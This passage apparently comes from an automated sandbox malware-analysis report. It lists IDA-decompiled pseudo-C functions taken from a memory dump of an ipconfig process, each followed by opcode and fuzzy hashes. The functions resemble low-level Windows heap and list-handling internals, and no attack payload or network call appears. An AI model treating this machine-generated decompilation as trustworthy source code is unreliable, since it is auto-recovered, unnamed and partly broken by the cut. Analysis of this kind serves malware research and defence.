              							_t27 =  *[fs:0x30];
              							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
              						}
              						if(( *_t42 & 0x00000020) != 0) {
              							L17:
              							_t25 = _v8;
              							_t36 = 0;
              							if(_t25 != 0) {
              								_t36 =  *((intOrPtr*)(_t25 + 0x18));
              							}
              							_t27 = E02F17794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
              						}
              						goto L5;
              					} else {
              						L5:
              						return _t27;
              					}
              				}
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
              • Instruction ID: 2b8ef8f25814319ca929db8eb38bbef26d5f9f9c9860c8386421c86bace3fa4d
              • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
              • Instruction Fuzzy Hash: 1B212932A01684DFDB139B68C988BA677D9EF41384F0900B1EE048B7D2D734DC80DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 82%
              			E02F17794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				intOrPtr _t21;
              				void* _t24;
              				intOrPtr _t25;
              				void* _t36;
              				short _t39;
              				signed char* _t42;
              				unsigned int _t46;
              				void* _t50;
              
              				_push(__ecx);
              				_push(__ecx);
              				_t21 =  *0x2f87b9c; // 0x0
              				_t46 = _a8;
              				_v12 = __edx;
              				_v8 = __ecx;
              				_t4 = _t46 + 0x2e; // 0x2e
              				_t36 = _t4;
              				_t24 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
              				_t50 = _t24;
              				if(_t50 != 0) {
              					_t25 = _a4;
              					if(_t25 == 5) {
              						L3:
              						_t39 = 0x14b1;
              					} else {
              						_t39 = 0x14b0;
              						if(_t25 == 6) {
              							goto L3;
              						}
              					}
              					 *((short*)(_t50 + 6)) = _t39;
              					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
              					_t11 = _t50 + 0x2c; // 0x2c
              					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
              					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
              					E02EDF3E0(_t11, _a12, _t46);
              					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
              					if(E02EB7D50() == 0) {
              						_t42 = 0x7ffe0384;
              					} else {
              						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              					}
              					_push(_t50);
              					_t19 = _t36 - 0x20; // 0xe
              					_push(0x403);
              					_push( *_t42 & 0x000000ff);
              					E02ED9AE0();
              					_t24 = L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
              				}
              				return _t24;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa612c4b5733f0cdcdcd43063edad13a079e2b8728e4a07329d94ab3742ddc2a
              • Instruction ID: 1f1e73d9a0a299fd11f6ede56cd88ab082239205214e9c1aed102f1ed79fbc5f
              • Opcode Fuzzy Hash: aa612c4b5733f0cdcdcd43063edad13a079e2b8728e4a07329d94ab3742ddc2a
              • Instruction Fuzzy Hash: 8121A172940604ABC725EF69DC90EABF7A9EF48390F10456DF60AC7750E734E900CB94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E02ECFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
              				intOrPtr _v8;
              				void* _t19;
              				intOrPtr _t29;
              				intOrPtr _t32;
              				intOrPtr _t35;
              				intOrPtr _t37;
              				intOrPtr* _t40;
              
              				_t35 = __edx;
              				_push(__ecx);
              				_push(__ecx);
              				_t37 = 0;
              				_v8 = __edx;
              				_t29 = __ecx;
              				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
              					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
              					L3:
              					_t19 = _a4 - 4;
              					if(_t19 != 0) {
              						if(_t19 != 1) {
              							L7:
              							return _t37;
              						}
              						if(_t35 == 0) {
              							L11:
              							_t37 = 0xc000000d;
              							goto L7;
              						}
              						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
              							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
              							_t35 = _v8;
              						}
              						 *((intOrPtr*)(_t40 + 4)) = _t35;
              						goto L7;
              					}
              					if(_t29 == 0) {
              						goto L11;
              					}
              					_t32 =  *_t40;
              					if(_t32 != 0) {
              						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
              						E02EA76E2( *_t40);
              					}
              					 *_t40 = _t29;
              					goto L7;
              				}
              				_t40 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
              				if(_t40 == 0) {
              					_t37 = 0xc0000017;
              					goto L7;
              				}
              				_t35 = _v8;
              				 *_t40 = 0;
              				 *((intOrPtr*)(_t40 + 4)) = 0;
              				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
              				goto L3;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
              • Instruction ID: fedb832c7e05ef9d6f12ea853b1642dd16cd6425f0d749bfa54811d66898e98b
              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
              • Instruction Fuzzy Hash: F7217F72A80641DFC731CF89C640FA6F7E6EB95B14F24D16EE94987A11D7309C01DB80
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E02E99240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
              				intOrPtr _t33;
              				intOrPtr _t37;
              				intOrPtr _t41;
              				intOrPtr* _t46;
              				void* _t48;
              				intOrPtr _t50;
              				intOrPtr* _t60;
              				void* _t61;
              				intOrPtr _t62;
              				intOrPtr _t65;
              				void* _t66;
              				void* _t68;
              
              				_push(0xc);
              				_push(0x2f6f708);
              				E02EED08C(__ebx, __edi, __esi);
              				_t65 = __ecx;
              				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
              				if( *(__ecx + 0x24) != 0) {
              					_push( *(__ecx + 0x24));
              					E02ED95D0();
              					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
              				}
              				L6();
              				L6();
              				_push( *((intOrPtr*)(_t65 + 0x28)));
              				E02ED95D0();
              				_t33 =  *0x2f884c4; // 0x0
              				L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
              				_t37 =  *0x2f884c4; // 0x0
              				L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
              				_t41 =  *0x2f884c4; // 0x0
              				E02EB2280(L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x2f886b4);
              				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
              				_t46 = _t65 + 0xe8;
              				_t62 =  *_t46;
              				_t60 =  *((intOrPtr*)(_t46 + 4));
              				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
              					_t61 = 3;
              					asm("int 0x29");
              					_push(_t65);
              					_t66 = _t61;
              					_t23 = _t66 + 0x14; // 0x8df8084c
              					_push( *_t23);
              					E02ED95D0();
              					_t24 = _t66 + 0x10; // 0x89e04d8b
              					_push( *_t24);
              					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
              					_t48 = E02ED95D0();
              					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
              					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
              					return _t48;
              				} else {
              					 *_t60 = _t62;
              					 *((intOrPtr*)(_t62 + 4)) = _t60;
              					 *(_t68 - 4) = 0xfffffffe;
              					E02E99325();
              					_t50 =  *0x2f884c4; // 0x0
              					return E02EED0D1(L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
              				}
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 20368f6917f6e877f5a3df747cf77a3a501c38031561731c51517a4d539dfe61
              • Instruction ID: 728cb5138dbfd9fd79c951e777b04f2b707efc54861af0a1e77e5b905bd8bc8d
              • Opcode Fuzzy Hash: 20368f6917f6e877f5a3df747cf77a3a501c38031561731c51517a4d539dfe61
              • Instruction Fuzzy Hash: 96214A324C0644DFC722EF28CE00F5AB7BABF08744F54956DA14A87AA2C734E951CF44
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 54%
              			E02ECB390(void* __ecx, intOrPtr _a4) {
              				signed int _v8;
              				signed char _t12;
              				signed int _t16;
              				signed int _t21;
              				void* _t28;
              				signed int _t30;
              				signed int _t36;
              				signed int _t41;
              
              				_push(__ecx);
              				_t41 = _a4 + 0xffffffb8;
              				E02EB2280(_t12, 0x2f88608);
              				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
              				asm("sbb edi, edi");
              				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
              				_v8 = _t36;
              				asm("lock cmpxchg [ebx], ecx");
              				_t30 = 1;
              				if(1 != 1) {
              					while(1) {
              						_t21 = _t30 & 0x00000006;
              						_t16 = _t30;
              						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
              						asm("lock cmpxchg [edi], esi");
              						if(_t16 == _t30) {
              							break;
              						}
              						_t30 = _t16;
              					}
              					_t36 = _v8;
              					if(_t21 == 2) {
              						_t16 = E02ED00C2(0x2f88608, 0, _t28);
              					}
              				}
              				if(_t36 != 0) {
              					_t16 = L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
              				}
              				return _t16;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 272c4b3364c01aafbe2c191f363554c478f58fa3a2d6914af84cd15a69097856
              • Instruction ID: 1b832fd43114fc110751e0735043fb935b759da261427da850d533a3bb1862cf
              • Opcode Fuzzy Hash: 272c4b3364c01aafbe2c191f363554c478f58fa3a2d6914af84cd15a69097856
              • Instruction Fuzzy Hash: E21129377511109BCB299A588E81A6BB397EBC53B4B28912DEE169B280CA315C02CA94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 90%
              			E02F24257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
              				intOrPtr* _t18;
              				intOrPtr _t24;
              				intOrPtr* _t27;
              				intOrPtr* _t30;
              				intOrPtr* _t31;
              				intOrPtr _t33;
              				intOrPtr* _t34;
              				intOrPtr* _t35;
              				void* _t37;
              				void* _t38;
              				void* _t39;
              				void* _t43;
              
              				_t39 = __eflags;
              				_t35 = __edi;
              				_push(8);
              				_push(0x2f708d0);
              				E02EED08C(__ebx, __edi, __esi);
              				_t37 = __ecx;
              				E02F241E8(__ebx, __edi, __ecx, _t39);
              				E02EAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
              				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
              				_t18 = _t37 + 8;
              				_t33 =  *_t18;
              				_t27 =  *((intOrPtr*)(_t18 + 4));
              				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
              					L8:
              					_push(3);
              					asm("int 0x29");
              				} else {
              					 *_t27 = _t33;
              					 *((intOrPtr*)(_t33 + 4)) = _t27;
              					_t35 = 0x2f887e4;
              					_t18 =  *0x2f887e0; // 0x0
              					while(_t18 != 0) {
              						_t43 = _t18 -  *0x2f85cd0; // 0xffffffff
              						if(_t43 >= 0) {
              							_t31 =  *0x2f887e4; // 0x0
              							_t18 =  *_t31;
              							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
              								goto L8;
              							} else {
              								 *0x2f887e4 = _t18;
              								 *((intOrPtr*)(_t18 + 4)) = _t35;
              								L02E97055(_t31 + 0xfffffff8);
              								_t24 =  *0x2f887e0; // 0x0
              								_t18 = _t24 - 1;
              								 *0x2f887e0 = _t18;
              								continue;
              							}
              						}
              						goto L9;
              					}
              				}
              				L9:
              				__eflags =  *0x2f85cd0;
              				if( *0x2f85cd0 <= 0) {
              					L02E97055(_t37);
              				} else {
              					_t30 = _t37 + 8;
              					_t34 =  *0x2f887e8; // 0x0
              					__eflags =  *_t34 - _t35;
              					if( *_t34 != _t35) {
              						goto L8;
              					} else {
              						 *_t30 = _t35;
              						 *((intOrPtr*)(_t30 + 4)) = _t34;
              						 *_t34 = _t30;
              						 *0x2f887e8 = _t30;
              						 *0x2f887e0 = _t18 + 1;
              					}
              				}
              				 *(_t38 - 4) = 0xfffffffe;
              				return E02EED0D1(L02F24320());
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c39b8f8e4442c066f93394f8fbd1cf5dc08fb5c1b464868dbacc88fb95377b58
              • Instruction ID: 768be9f19e97f6959c04d7df6f22b7685f315ec695dc172b1a8b8da0c8b11668
              • Opcode Fuzzy Hash: c39b8f8e4442c066f93394f8fbd1cf5dc08fb5c1b464868dbacc88fb95377b58
              • Instruction Fuzzy Hash: 0D218870E80A18CFCB24DF65D900A28F7F2FB867D4BA4966AD2058B290DB759895CF10
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 29%
              			E02EC2397(intOrPtr _a4) {
              				void* __ebx;
              				void* __ecx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				signed int _t11;
              				void* _t19;
              				void* _t25;
              				void* _t26;
              				intOrPtr _t27;
              				void* _t28;
              				void* _t29;
              
              				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
              				if( *0x2f8848c != 0) {
              					L02EBFAD0(0x2f88610);
              					if( *0x2f8848c == 0) {
              						E02EBFA00(0x2f88610, _t19, _t27, 0x2f88610);
              						goto L1;
              					} else {
              						_push(0);
              						_push(_a4);
              						_t26 = 4;
              						_t29 = E02EC2581(0x2f88610, 0x2e750a0, _t26, _t27, _t28);
              						E02EBFA00(0x2f88610, 0x2e750a0, _t27, 0x2f88610);
              					}
              				} else {
              					L1:
              					_t11 =  *0x2f88614; // 0x1
              					if(_t11 == 0) {
              						_t11 = E02ED4886(0x2e71088, 1, 0x2f88614);
              					}
              					_push(0);
              					_push(_a4);
              					_t25 = 4;
              					_t29 = E02EC2581(0x2f88610, (_t11 << 4) + 0x2e75070, _t25, _t27, _t28);
              				}
              				if(_t29 != 0) {
              					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
              					 *((char*)(_t29 + 0x40)) = 0;
              				}
              				return _t29;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: afbd550e83d6714f56a858490a9112a36c63421690fbe81d099236bd3aa3cbec
              • Instruction ID: 0c71713c5f7e5cba969cc81ebaff5cacc6423695fba1db7ab89e039f23c4046c
              • Opcode Fuzzy Hash: afbd550e83d6714f56a858490a9112a36c63421690fbe81d099236bd3aa3cbec
              • Instruction Fuzzy Hash: B7112B327C030567D720A67DAD90B67F68ABF50790F64E42EFF02AB190C6B0D802CB54
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E02F146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
              				signed short* _v8;
              				unsigned int _v12;
              				intOrPtr _v16;
              				signed int _t22;
              				signed char _t23;
              				short _t32;
              				void* _t38;
              				char* _t40;
              
              				_v12 = __edx;
              				_t29 = 0;
              				_v8 = __ecx;
              				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
              				_t38 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
              				if(_t38 != 0) {
              					_t40 = _a4;
              					 *_t40 = 1;
              					E02EDF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
              					_t22 = _v12 >> 1;
              					_t32 = 0x2e;
              					 *((short*)(_t38 + _t22 * 2)) = _t32;
              					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
              					_t23 = E02ECD268(_t38, 1);
              					asm("sbb al, al");
              					 *_t40 =  ~_t23 + 1;
              					L02EB77F0(_v16, 0, _t38);
              				} else {
              					 *_a4 = 0;
              					_t29 = 0xc0000017;
              				}
              				return _t29;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
              • Instruction ID: b0300d317d01751afd3815685d000ec77de925992089250df30ce8c2bcfd95d7
              • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
              • Instruction Fuzzy Hash: 6F11C272944208BBC7059F6C98809BEF7B9EF95344F1080AEF984CB351DA318D55D7A4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 42%
              			E02E9C962(char __ecx) {
              				signed int _v8;
              				intOrPtr _v12;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr _t19;
              				char _t22;
              				intOrPtr _t26;
              				intOrPtr _t27;
              				char _t32;
              				char _t34;
              				intOrPtr _t35;
              				intOrPtr _t37;
              				intOrPtr* _t38;
              				signed int _t39;
              
              				_t41 = (_t39 & 0xfffffff8) - 0xc;
              				_v8 =  *0x2f8d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
              				_t34 = __ecx;
              				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
              					_t26 = 0;
              					E02EAEEF0(0x2f870a0);
              					_t29 =  *((intOrPtr*)(_t34 + 0x18));
              					if(E02F1F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
              						L9:
              						E02EAEB70(_t29, 0x2f870a0);
              						_t19 = _t26;
              						L2:
              						_pop(_t35);
              						_pop(_t37);
              						_pop(_t27);
              						return E02EDB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
              					}
              					_t29 = _t34;
              					_t26 = E02F1F1FC(_t34, _t32);
              					if(_t26 < 0) {
              						goto L9;
              					}
              					_t38 =  *0x2f870c0; // 0x0
              					while(_t38 != 0x2f870c0) {
              						_t22 =  *((intOrPtr*)(_t38 + 0x18));
              						_t38 =  *_t38;
              						_v12 = _t22;
              						if(_t22 != 0) {
              							_t29 = _t22;
              							 *0x2f8b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
              							_v12();
              						}
              					}
              					goto L9;
              				}
              				_t19 = 0;
              				goto L2;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5fe05839262fa1e60fe347dbb3acef555b914a19488f3d32c3174d0b1ed42bd2
              • Instruction ID: cb50ee6cd03255f702bf6c06b6f6678e9fd677dae5deb0fd7e542440fb209660
              • Opcode Fuzzy Hash: 5fe05839262fa1e60fe347dbb3acef555b914a19488f3d32c3174d0b1ed42bd2
              • Instruction Fuzzy Hash: 1C1125327006469BE710BF28CC95A2BF7E2BF84694B204579FA4297690DB20FC10DBC1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E02ED37F5(void* __ecx, intOrPtr* __edx) {
              				void* __ebx;
              				void* __edi;
              				signed char _t6;
              				intOrPtr _t13;
              				intOrPtr* _t20;
              				intOrPtr* _t27;
              				void* _t28;
              				intOrPtr* _t29;
              
              				_t27 = __edx;
              				_t28 = __ecx;
              				if(__edx == 0) {
              					E02EB2280(_t6, 0x2f88550);
              				}
              				_t29 = E02ED387E(_t28);
              				if(_t29 == 0) {
              					L6:
              					if(_t27 == 0) {
              						E02EAFFB0(0x2f88550, _t27, 0x2f88550);
              					}
              					if(_t29 == 0) {
              						return 0xc0000225;
              					} else {
              						if(_t27 != 0) {
              							goto L14;
              						}
              						L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
              						goto L11;
              					}
              				} else {
              					_t13 =  *_t29;
              					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
              						L13:
              						_push(3);
              						asm("int 0x29");
              						L14:
              						 *_t27 = _t29;
              						L11:
              						return 0;
              					}
              					_t20 =  *((intOrPtr*)(_t29 + 4));
              					if( *_t20 != _t29) {
              						goto L13;
              					}
              					 *_t20 = _t13;
              					 *((intOrPtr*)(_t13 + 4)) = _t20;
              					asm("btr eax, ecx");
              					goto L6;
              				}
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b41df1bcf106292f8f2661f54eabcf2fbf0f944f7d88ead8250cb8577d2eff94
              • Instruction ID: bb54d582a7458379e4dbd736c4aab01a2f75e54b4c5cb2c24536f6717580e81d
              • Opcode Fuzzy Hash: b41df1bcf106292f8f2661f54eabcf2fbf0f944f7d88ead8250cb8577d2eff94
              • Instruction Fuzzy Hash: 7A0126BA9C16109BC3378B1A9900F27BBA7DF81B64725D0A9F9498B380C730C802CF81
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02EC002D() {
              				void* _t11;
              				char* _t14;
              				signed char* _t16;
              				char* _t27;
              				signed char* _t29;
              
              				_t11 = E02EB7D50();
              				_t27 = 0x7ffe0384;
              				if(_t11 != 0) {
              					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              				} else {
              					_t14 = 0x7ffe0384;
              				}
              				_t29 = 0x7ffe0385;
              				if( *_t14 != 0) {
              					if(E02EB7D50() == 0) {
              						_t16 = 0x7ffe0385;
              					} else {
              						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
              					}
              					if(( *_t16 & 0x00000040) != 0) {
              						goto L18;
              					} else {
              						goto L3;
              					}
              				} else {
              					L3:
              					if(E02EB7D50() != 0) {
              						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              					}
              					if( *_t27 != 0) {
              						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
              							goto L5;
              						}
              						if(E02EB7D50() != 0) {
              							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
              						}
              						if(( *_t29 & 0x00000020) == 0) {
              							goto L5;
              						}
              						L18:
              						return 1;
              					} else {
              						L5:
              						return 0;
              					}
              				}
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
              • Instruction ID: d1277b4cce78d55c02f62d7b2b0c7a6a511e50076ddd871ff7fe5f1c167aa2f8
              • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
              • Instruction Fuzzy Hash: CE118E76A516C0CFD7238768C685B7677D5EF427E8F1A54E0EF0087AD2D328C842D620
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 94%
              			E02EA766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
              				char _v8;
              				void* _t22;
              				void* _t24;
              				intOrPtr _t29;
              				intOrPtr* _t30;
              				void* _t42;
              				intOrPtr _t47;
              
              				_push(__ecx);
              				_t36 =  &_v8;
              				if(E02ECF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
              					L10:
              					_t22 = 0;
              				} else {
              					_t24 = _v8 + __ecx;
              					_t42 = _t24;
              					if(_t24 < __ecx) {
              						goto L10;
              					} else {
              						if(E02ECF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
              							goto L10;
              						} else {
              							_t29 = _v8 + _t42;
              							if(_t29 < _t42) {
              								goto L10;
              							} else {
              								_t47 = _t29;
              								_t30 = _a16;
              								if(_t30 != 0) {
              									 *_t30 = _t47;
              								}
              								if(_t47 == 0) {
              									goto L10;
              								} else {
              									_t22 = L02EB4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
              								}
              							}
              						}
              					}
              				}
              				return _t22;
              			}











              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
